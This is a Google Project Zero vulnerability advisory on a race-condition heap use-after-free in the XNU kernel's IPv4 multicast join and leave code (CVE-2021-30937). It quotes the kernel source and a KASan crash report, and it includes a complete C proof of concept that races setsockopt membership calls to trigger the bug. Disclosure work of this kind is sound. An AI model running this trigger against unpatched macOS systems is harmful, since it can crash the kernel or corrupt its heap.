Authored by Google Security Research, Glazunov

XNU suffers from a heap use-after-free vulnerability in inm_merge.


XNU: heap-use-after-free in inm_merge

VULNERABILITY DETAILS
bsd/netinet/in_mcast.c:
```
int
inp_join_group(struct inpcb *inp, struct sockopt *sopt)
{
        [...]
        if (is_new) {
                if (imo->imo_num_memberships == imo->imo_max_memberships) {
                        error = imo_grow(imo, 0); // *** 1 ***
                        if (error) {
                                goto out_imo_locked;
                        }
                }
                /*
                 * Allocate the new slot upfront so we can deal with
                 * grafting the new source filter in same code path
                 * as for join-source on existing membership.
                 */
                idx = imo->imo_num_memberships; // *** 2 ***
                imo->imo_membership[idx] = NULL;
                imo->imo_num_memberships++;
                VERIFY(imo->imo_mfilters != NULL);
                imf = &imo->imo_mfilters[idx]; // *** 3 ***
                VERIFY(RB_EMPTY(&imf->imf_sources));
        }
        [...]
        if (is_new) {
                /*
                 * Unlock socket as we may end up calling ifnet_ioctl() to join (or leave)
                 * the multicast group and we run the risk of a lock ordering issue
                 * if the ifnet thread calls into the socket layer to acquire the pcb list
                 * lock while the input thread delivers multicast packets
                 */
                IMO_ADDREF_LOCKED(imo);
                IMO_UNLOCK(imo);
                socket_unlock(inp->inp_socket, 0); // *** 4 ***

                VERIFY(inm == NULL);
                error = in_joingroup(ifp, &gsa->sin_addr, imf, &inm); // *** 5 ***

                socket_lock(inp->inp_socket, 0);
                IMO_REMREF(imo);
                IMO_LOCK(imo);

                VERIFY(inm != NULL || error != 0);
                if (error) {
                        goto out_imo_free;
                }
                imo->imo_membership[idx] = inm; /* from in_joingroup() */ // *** 6 ***
        }
        [...]
        if (error) {
                imf_rollback(imf);
                if (is_new) {
                        imf_purge(imf);
                } else {
                        imf_reap(imf);
                }
        } else {
                imf_commit(imf); // *** 7 ***
        }
        [...]

int
inp_leave_group(struct inpcb *inp, struct sockopt *sopt)
{
        [...]
        IMO_LOCK(imo);
        idx = imo_match_group(imo, ifp, gsa); // *** 8 ***
        if (idx == (size_t)-1) {
                error = EADDRNOTAVAIL;
                goto out_locked;
        }
        inm = imo->imo_membership[idx];
        imf = &imo->imo_mfilters[idx];
        [...]
        if (is_final) {
                /* Remove the gap in the membership array. */
                VERIFY(inm == imo->imo_membership[idx]);
                imo->imo_membership[idx] = NULL;

                /*
                 * See inp_join_group() for why we need to unlock
                 */
                IMO_ADDREF_LOCKED(imo);
                IMO_UNLOCK(imo); // *** 9 ***
                socket_unlock(inp->inp_socket, 0);

                INM_REMREF(inm);

                socket_lock(inp->inp_socket, 0);
                IMO_REMREF(imo);
                IMO_LOCK(imo);

                for (++idx; idx < imo->imo_num_memberships; ++idx) { // *** 10 ***
                        imo->imo_membership[idx - 1] = imo->imo_membership[idx];
                        imo->imo_mfilters[idx - 1] = imo->imo_mfilters[idx];
                }
                imo->imo_num_memberships--;
        }
```

When `inp_join_group` needs to create a new membership entry, it briefly releases the socket and `ip_moptions` locks[4]. The locking pattern makes the following issues possible:

1. Before releasing the locks, the function stores a pointer into the `imo_mfilters` buffer in the local variable `imf`[3]. Once the locks are dropped[4], a concurrent call to `inp_join_group` may trigger a reallocation of `imo_membership` and `imo_mfilters`[1], leaving `imf` dangling. The stale pointer is then dereferenced in `in_joingroup`[5] and, after the locks are reacquired, in `imf_commit`[7]. The latter writes to the referenced object, so it should be possible to exploit the bug to corrupt the heap. A minimal userspace sketch of this pattern follows the KASan report below.

KASan reports as follows:

```
KASan: invalid 8-byte load from 0xffffff801c07b6e0 [HEAP_FREED]
Shadow 0 1 2 3 4 5 6 7 8 9 a b c d e f
fffff7f00380f680: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
fffff7f00380f690: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
fffff7f00380f6a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
fffff7f00380f6b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
fffff7f00380f6c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
fffff7f00380f6d0: fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd
fffff7f00380f6e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
fffff7f00380f6f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
fffff7f00380f700: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
fffff7f00380f710: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
fffff7f00380f720: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd

* thread #2, stop reason = breakpoint 1.1
* frame #0: 0xffffff800e2f32f0 kernel.kasan`panic
frame #1: 0xffffff800e303229 kernel.kasan`kasan_report_internal.cold.1 + 25
frame #2: 0xffffff800e2e847d kernel.kasan`kasan_report_internal + 845
frame #3: 0xffffff800e2e5fc3 kernel.kasan`kasan_crash_report + 51
frame #4: 0xffffff800e2e60e5 kernel.kasan`__asan_report_load8 + 21
frame #5: 0xffffff800d7ebaa4 kernel.kasan`inm_merge + 6836
frame #6: 0xffffff800d7ecbc0 kernel.kasan`in_joingroup + 3200
frame #7: 0xffffff800d7f07c3 kernel.kasan`inp_join_group + 6291
frame #8: 0xffffff800d7f4050 kernel.kasan`inp_setmoptions + 672
frame #9: 0xffffff800d85c6ea kernel.kasan`ip_ctloutput + 922
frame #10: 0xffffff800d904617 kernel.kasan`udp_ctloutput + 599
frame #11: 0xffffff800dd0a6cf kernel.kasan`sosetoptlock + 1567
frame #12: 0xffffff800dd38653 kernel.kasan`setsockopt + 787
frame #13: 0xffffff800df8dcd0 kernel.kasan`unix_syscall64 + 2192
frame #14: 0xffffff800d016a36 kernel.kasan`hndl_unix_scall64 + 22
```

2. Similarly, the index stored in `idx`[2] may be invalidated by a concurrent call to `inp_leave_group`, which closes gaps in `imo_membership` by shifting the remaining elements down[10]. As a result, `inp_join_group` may overwrite another entry's membership slot[6]. The same issue can be triggered by racing two `inp_leave_group` calls against each other, because `inp_leave_group` also saves the requested entry's index[8] before unlocking[9]. However, I was unable to turn this variant into anything more serious than a NULL pointer dereference, so it is likely not a security issue. A simplified sketch of the stale-index case follows.
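
The following is a simplified, single-threaded sketch of that variant (again not XNU code): a join reserves a slot and remembers its index, a concurrent leave compacts the array, and the deferred write then lands past the in-use area while a NULL entry is left behind.

```
/* Userspace sketch only; the array stands in for imo_membership. */
#include <stdio.h>

int main(void) {
  const char *membership[8] = { "group0", "group1", "group2" };
  size_t num = 3;

  /* inp_join_group(): reserve a new slot and remember its index. */
  size_t saved_idx = num;
  membership[saved_idx] = NULL;
  num++;

  /* Concurrent inp_leave_group() for index 1: close the gap by shifting
   * the following entries down, as at *** 10 ***. */
  for (size_t idx = 2; idx < num; ++idx) {
    membership[idx - 1] = membership[idx];
  }
  num--;

  /* The join resumes and writes through the stale index: the reserved NULL
   * slot has moved down by one, so the new entry ends up outside the
   * in-use area and slot 2 stays NULL, which later code dereferences. */
  membership[saved_idx] = "new group";

  for (size_t i = 0; i < num; ++i) {
    printf("slot %zu: %s\n", i, membership[i] ? membership[i] : "(NULL)");
  }
  return 0;
}
```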

Note that the IPv6 implementation in `in6_mcast.c` is also affected.


VERSION
macOS 11.5.2 (20G95)


REPRODUCTION CASE
We need to fill the membership array almost up to its initial capacity so that one of the racing `IP_ADD_MEMBERSHIP` calls triggers `imo_grow`, which reallocates `imo_membership` and `imo_mfilters`.

```
#include <arpa/inet.h>
#include <netinet/in.h>
#include <pthread.h>
#include <sys/socket.h>
#include <unistd.h>

#ifndef IP_MIN_MEMBERSHIPS
/* Initial capacity of imo_membership/imo_mfilters (XNU: bsd/netinet/in.h). */
#define IP_MIN_MEMBERSHIPS 31
#endif

volatile int lock_a;
volatile int lock_b;

int fd;
struct sockaddr_in saddr;

struct ip_mreq filler_group;
struct ip_mreq group_a;
struct ip_mreq group_b;

/* Second racer: joins group_a as soon as the main thread is ready. */
void* thread_func(void* arg) {
  (void)arg;
  lock_a = 1;
  while (lock_b == 0) {}

  setsockopt(fd, IPPROTO_IP, IP_ADD_MEMBERSHIP, &group_a, sizeof(group_a));

  return NULL;
}

int main() {
  int status;
  pthread_t th;

  saddr.sin_family = AF_INET;

  group_a.imr_multiaddr.s_addr = inet_addr("224.0.0.1");
  group_b.imr_multiaddr.s_addr = inet_addr("224.0.0.2");

  for (int i = 0; i < 100000; ++i) {
    /* Reset the handshake flags for this attempt. */
    lock_a = 0;
    lock_b = 0;

    fd = socket(AF_INET, SOCK_DGRAM, 0);

    status = bind(fd, (struct sockaddr *) &saddr, sizeof(saddr));

    /*
     * Pre-join IP_MIN_MEMBERSHIPS - 1 groups so that the two racing joins
     * exhaust the initial capacity and one of them has to call imo_grow().
     */
    for (int j = 0; j < IP_MIN_MEMBERSHIPS - 1; ++j) {
      filler_group.imr_multiaddr.s_addr = htonl(ntohl(inet_addr("224.0.0.3")) + j);
      status = setsockopt(fd, IPPROTO_IP, IP_ADD_MEMBERSHIP, &filler_group, sizeof(filler_group));
    }

    pthread_create(&th, NULL, thread_func, NULL);

    /* Wait for the second thread, then let both joins race. */
    while (lock_a == 0) {}
    lock_b = 1;

    status = setsockopt(fd, IPPROTO_IP, IP_ADD_MEMBERSHIP, &group_b, sizeof(group_b));

    pthread_join(th, NULL);

    close(fd);
  }
}
```
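
Assuming the listing is saved as `poc.c`, it should build with a plain `clang poc.c -o poc`; when run against a KASan kernel, it is expected to eventually produce a report like the one shown above.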


CREDIT INFORMATION
Sergei Glazunov of Google Project Zero


This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2021-12-06.


Related CVE Numbers: CVE-2021-30937.


